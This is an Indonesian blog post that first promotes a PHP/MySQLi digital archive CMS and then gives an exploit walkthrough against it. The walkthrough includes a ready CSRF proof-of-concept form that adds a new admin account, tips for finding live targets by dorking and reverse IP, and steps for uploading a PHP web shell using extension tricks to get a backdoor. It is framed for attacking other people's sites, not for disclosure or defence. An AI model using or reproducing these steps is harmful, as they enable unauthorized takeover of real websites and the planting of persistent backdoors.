free web hit counter

Sistem Informasi Arsip Digital – Cross-Site Request Forgery (Add New Admin) 2021

Hi semuanya sudah lama gak nulis seputar exploit lagi di website / blog gajelas isinya ini, dan kali ini ingin nulis Sistem Informasi Arsip Digital – Cross-Site Request Forgery (Add New Admin).

Cerita dikit sebelumnya sedang gabut banget gak bisa tidur dan akhirnya iseng cari beberapa website yang vuln sql bypass login / bypass admin. dan akhirnya nemulah cms ini Sistem Informasi Arsip Digital.

Detail Cms Sistem Informasi Arsip Digital

Sistem arsip digital ini dibuat menggunnakan PHP, dan menggunakan MySQLi sebagai databasenya.

Berikut adalah beberapa fitur unggulan yang ada pada sistem informasi/aplikasi ini.

Fitur Sistem Informasi Arsip Digital Dengan PHP dan MySQLi

Sistem informasi ini memiliki beberapa fitur unggulan, diantaranya adalah :

  • Login
  • Pesan alert jika login gagal
  • Logout
  • Pesan Alert jika berhasil logout
  • Multi login user
  • Multi level user (admin,petugas & user)
  • Perhitungan jumlah arsip, user, petugas pada halaman dashboard
  • Terdapat grafik jumlah download perhari pada dashboard admin dan petugas
  • Riwayat download arsip tercatat secara otomatis, dan tampil pada admin dan petugas
  • Pop up notifikasi untuk konfirmasi hapus pada saat tombol hapus arsip diklik
  • Upload foto profil
  • Update profil admin,petugas & user
  • Ganti password admin,petugas & user
  • Live preview file pdf dan file gambar
  • Pagination dan search menggunakan DataTables
  • Template admin responsive
  • dan lain-lain, fitur selengkapnya bisa teman-teman lihat pada link demo

Hak Akses Sistem Informasi Arsip Digital Dengan PHP dan MySQLi

Sistem informasi ini memiliki 3 hak akses pengguna, diantaranya adalah admin, petugas dan user.

Masing-masing hak akses tersebut memiliki batas akses masing-masing. berikut adalah beberapa fitur yang bisa diakses oleh masing-masing pengguna atau hak akses.

Hak Akses Admin (administrator)

  • login
  • logout
  • ganti password
  • ganti foto profil
  • ganti profil (nama, username)
  • halaman dashboard
  • ringkasan jumlah arsip, petugas, user pada halaman dashboard admin
  • grafik jumlah download arsip per tanggal pada halaman dashboard
  • CRUD kategori arsip
    • Melihat data kategori
    • Menginput kategori baru
    • Edit kategori
    • Hapus kategori
  • CRUD data petugas
    • Melihat data petugas
    • Menginput petugas
    • Edit petugas
    • Hapus petugas
  • CRUD data user
    • Melihat data user
    • Menginput user
    • Edit petugas
    • Hapus petugas
  • Mengontrol arsip
    • Melihat data arsip
    • Preview arsip
    • Hapus arsip
    • Download arsip
  • Riwayat user yang mendownload arsip
  • dan lain-lain

Hak Akses Petugas

  • Login
  • Logout
  • Ganti password
  • Ganti foto profil
  • Ganti profil (nama, username)
  • Halaman dashboard
  • Ringkasan jumlah arsip, petugas, user pada halaman dashboard
  • Grafik jumlah download arsip per tanggal pada halaman dashboard
  • Melihat data kategori
  • Melihat data petugas
  • Melihat data user
  • CRUD Arsip
    • Melihat data arsip yang diupload oleh petugas tersebut
    • Preview arsip
    • Edit arsip
    • Hapus Arsip
    • Download arsip
  • Riwayat user yang mendownload arsip si petugas tersebut
  • dan lain-lain

Hak Akses User

  • Login
  • Logout
  • Ganti password
  • Ganti foto profil
  • Ganti profil (nama, username)
  • Halaman dashboard
  • Ringkasan jumlah arsip pada halaman dashboard
  • Melihat arsip
  • Menampilkan arsip berdasarkan kategori
  • Preview Arsip
  • Download arsip
  • Detail Arsip
  • Dan lain-lain

Untuk Siapa Source Code Ini Cocok ?

Source code sistem informasi arsip digital berbasis web menggunakan php dan mysqli ini cocok untuk teman-teman yang sedang mencari referensi bagaimana alur membuat aplikasi yang menggunakan fitur upload dan download untuk berbagi file antar user.

Bisa diterapkan pada perusahaan dengan beberapa pengembangan dan juga cocok untuk referensi tugas kuliah.

Bisa dikembangkan menjadi sistem informasi apa saja ?

Mungkin dari referensi source code ini bisa dikembangkan menjadi :

  • Sistem Informasi Manajemen Surat
  • Sistem Informasi Manajemen Surat Masuk dan Surat Keluar
  • Sistem Informasi Manajemen Arsip
  • Sistem Informasi Manajemen Berkas
  • Aplikasi File Manager
  • Sistem Informasi Upload dan Download File
  • Sistem Informasi Layanan Berbagi File

Demo Cms Sistem Informasi Arsip Digital

Download / Beli Cms Sistem Informasi Arsip Digital

cms ini di developer oleh malascoding, dan cms ini berbayar alias bukan gratis yoo buat yang ingin beli silakan.

Nah itu sedikit informasi panjang cms Sistem Informasi Arsip Digital (jujur ajah untuk keperluan seo ajah) sekarang ke exploit Sistem Informasi Arsip Digital

#1 Sistem Informasi Arsip Digital – Bypass Admin Login

Yang pertama ad bug Bypass Admin Login pada cms ini, mungkiin yah pastinya tidak asing lagi di telinga para it security dan deface gak perlu saya jelasin panjang lebar karena bug ini sudah di temukan sebelumnya.

berikut video Bypass Admin Login pada cms SIAD

Di Unggah pada 24 nov 2020 oleh jogja xploit

Memang ada beberapa yang bisa di bypas tapi beberapa juga ada yang tidak bisa setelah saya coba.

#2 Sistem Informasi Arsip Digital – Cross-Site Request Forgery (Add New Admin)

Bug / Vuln yang kedua adalah Cross-Site Request Forgery (CSRF) gak perlu saya jelasin detailnya apa ini karena mungkin sudah tau artinya jika belum silkan ke owasp csrf saja.

seperti pada gambar di atas itu merupakan salah satu source code dari fungsi admin untuk menambahkan admin baru, jika ditelaah lebih detail disana tidak ada fungsi season / semacanya jadi kita bisa melakukan Cross-Site Request Forgery untuk menambahkan admin baru

sebernarnya hampir di semua “Aksi Admin” kita bisa melakukan Cross-Site Request Forgery sih,tapi disini langsung ke tambah admin saja.

POC Sistem Informasi Arsip Digital – Cross-Site Request Forgery (Add New Admin)

  • Pertama silakan gunakan segala cara untuk mendapatkan website yang menggunakan cms ini baik dorking, reverseIP dll
  • Kedua kalo sudah dapat simpan kode berikut dalam format .html

<form method="post" action="http://[site]/admin/petugas_aksi.php" enctype="multipart/form-data">

<div class="form-group">
   <label>Nama</label>
        <input type="text" class="form-control" name="nama" required="required">
</div>

 <div class="form-group">
    <label>Username</label>
        <input type="text" class="form-control" name="username" required="required">
</div>

<div class="form-group">
    <label>Password</label>
        <input type="password" class="form-control" name="password" required="required">
</div>

<div class="form-group">
    <label>Foto</label>
        <input type="file" name="foto">
</div>

 <div class="form-group">
    <label></label>
        <input type="submit" class="btn btn-primary" value="Simpan">
</div>

</form>

silakan ganti [site] dengan target kalian

  • Buka file tersebut dengan browse chrome,opera. mozilla,edge up to yo
  • isi formnya seperti nama,username, password, dan foto (optional)
  • Kalo sudah tinggal klik simpan saja dan akan di re-direct ke halaman admin login, langsung saja login dengan akun admin yang sudah kalian buat tadi dengan metode Cross-Site Request Forgery tadi dan pilih hak petugas.
demo halaman login

Cara Upload Shell Sistem Informasi Arsip Digital

petugas Sistem Informasi Arsip Digital
  • Pertama kalian login dengan Hak User “Petugas
  • kedua jika sudah klik icon / tulisan arsip saya
  • ketiga silakan tambahkan arsip baru
  • ke-empat isi semua data dan pada file upload shell dengan extension .phtml / .php5 / .PhP / .pHp
  • dan shell sudah terupload klik icon download untuk di arahkan ke shell backdoor anda

Akhir Kata

Terima kasih sudah membaca artikel yang seharusnya singkat tapi karena lagi senggang banget ge jadiin panjang ajah dah ahahah, dan kenapa tidak mencantumkan dork silakan cari sendiri saja yoo!!

Leave a Comment